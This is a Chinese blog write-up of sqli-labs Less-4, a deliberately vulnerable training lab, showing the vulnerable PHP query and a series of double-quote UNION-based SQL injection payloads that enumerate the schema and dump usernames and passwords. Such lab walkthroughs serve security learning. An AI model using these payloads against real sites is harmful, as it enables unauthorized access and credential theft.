首页 > 其他分享 >第四关-Less-4:

第四关-Less-4:

时间:2024-02-01 22:34:20浏览次数:27  
标签:group Less union 第四 concat --+ id select

第四关-Less-4:

GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

判断注入点:

我们输入 ?id=1' 时来查看页面的回显:

发现页面并没有任何变化

我们再输入?id=1"(双引号)来查看页面回显:

这里根据报错,我们可以知道SQL语句是双引号字符型且有括号,所以我们需要闭合双引号也还需要考虑括号

我们来查看一下关键源码:

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

所以这里我们可以构造以下payload:

?id=1")--+

?id=1") order by 3--+

?id=-1") union select 1,2,3--+

?id=-1") union select 1,database(),version()--+

?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

注入成功

标签:group,Less,union,第四,concat,--+,id,select
From: https://www.cnblogs.com/xyweiwen/p/18002271

相关文章

  • 【IEEE出版|往届均已EI检索】第四届电子,电路和信息工程国际学术会议(ECIE 2024)
    大会时间:2024年5月24-26日|中国-杭州主办单位:浙江工业大学接受/拒稿通知:投稿后1周左右收录检索:IEEEXplore收录,EI,Scopus参会类型:全文投稿、口头报告、海报展示、仅参会会议官网:https://www.ais.cn/attendees/index/ZBJRJN参会方式:全文投稿、口头报告、海报展示、仅参会......
  • 《系统科学》第四章读后感
    在阅读了《系统科学》第四章之后,我对系统科学的研究方法和应用有了更深入的了解。这一张主要介绍了系统科学中的建模方法和实际应用案例。首先,作者在这一章中详细介绍了系统科学中的建模方法。建模方法主要包括数学建模、计算机模拟、系统动力学等。这些方法可以理解系统内部......
  • 第四周
    用whilereadline和/etc/passwd,计算用户id总和。#!/bin/bashsum=0whilereadline;doif[["$line"=~/sbin/nologin$]];then uid=$(echo$line|cut-d:-f3) sum=$(($sum+$uid))fidone</etc/passwdecho"用户id的总和为:$sum"......
  • 代码随想录算法训练营第四天 |24. 两两交换链表中的节点 | 19.删除链表的倒数第N个节
    142.环形链表II 已解答中等 相关标签相关企业 给定一个链表的头节点 head ,返回链表开始入环的第一个节点。 如果链表无环,则返回 null。如果链表中有某个节点,可以通过连续跟踪 next 指针再次到达,则链表中存在环。为了表示给定链表中的环,......
  • 第四章读后感
    《程序是怎样跑起来的》第四章,这一章以独特的角度,阐述了内存的重要性。开篇,作者在标题中就提出“有棱有角的内存”这一概念,形象地描述了内存的结构和特性。对于一个初学者来说,无疑是一个很新奇、有趣的视角。过去,我以为内存只是一个简单的存储东西的地方,但是了解了内存的物理机制......
  • CF138A Literature Lesson
    原题传送门分析既然题目要求求出所有四行诗共同的形态,那我们就想到可以用位运算。我们用二的次方来表示每一种形态,然后把每一篇诗的形态或起来,就可以得到最终的形态。输出的时候再拿个函数转一下就行了。有了基本框架,我们就可以开始构造特殊情况。题目中说到如果有aaaa这种......
  • 第三关-Less-3
    第三关-Less-3:GET-Errorbased-Singlequoteswithtwiststring(基于错误的GET单引号变形字符型注入):判断注入点:当我们在输入?id=1'的时候看到页面报错信息。可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。这时我们来查看源码的关键部分......
  • 第二关-less-2:
    sqli-labs第二关:先判断是否存在sql注入漏洞页面回显返回错误,说明存在sql注入再判断它的注入点通过回显可知是数字型注入,然后现在将第一关的sql注入语句改为数字型,就可以注入成功//判断字段:?id=1orderby1--+?id=1orderby2--+?id=1orderby3--+?id=1ord......
  • IPQ4019: Revolutionizing Long-Range Wireless Connectivity
    UnveilingtheIPQ4019:RevolutionizingLong-RangeWirelessConnectivityIntroduction:TheIPQ4019System-on-Chip(SoC)emergesasagame-changerforPoint-to-Point(PTP)andPoint-to-Multipoint(PTMP)applications,presentingadvancedfeaturestailoredfor......
  • AI 绘画平台难开发,难变现?试试 Stable Diffusion API Serverless 版解决方案
    AI绘画平台难开发,难变现?试试StableDiffusionAPIServerless版解决方案136人阅读14分钟前分享全屏显示Stable Diffusion 模型,已经成为 AI 行业从传统深度学习时代走向 AIGC 时代的标志性里程碑。越来越多的开发者借助 stable-diffusion-webui (以下简称 SDWeb......